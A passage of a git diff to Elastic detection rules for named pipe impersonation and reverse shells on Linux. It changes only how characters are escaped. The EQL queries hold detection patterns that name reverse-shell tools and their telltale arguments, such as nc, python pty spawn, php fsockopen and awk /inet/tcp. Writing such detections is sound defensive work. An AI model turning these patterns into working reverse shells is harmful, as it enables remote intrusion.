a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json index a5d9a634271..0e55e02b8e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json +++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Rogue Named Pipe Impersonation", - "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "file where host.os.type == \"windows\" and event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n", "references": [ "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", - "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \u0026quot;contains\u0026quot; and keyword equal \u0026quot;pipe\u0026quot;`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal "contains" and keyword equal "pipe"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json index 850f8c6144c..80c369615fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json +++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Rogue Named Pipe Impersonation", - "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "file where host.os.type == \"windows\" and event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n", "references": [ "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", - "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \u0026quot;contains\u0026quot; and keyword equal \u0026quot;pipe\u0026quot;`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal "contains" and keyword equal "pipe"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json index 2253e4dc542..5c4e2496b12 100644 --- a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json +++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json @@ -43,7 +43,7 @@ ], "risk_score": 73, "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", - "setup": "\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json index 386d2c47244..1dfe4c1fc6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json index 7b777d7fc15..9e44f5c454e 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json index 8757d31d36a..1b455b0cc83 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json index e02f4ce40f9..2262946080c 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json index 32992617ec8..a243b8bf462 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json index 2ffcccf9392..a5e68ad6478 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git 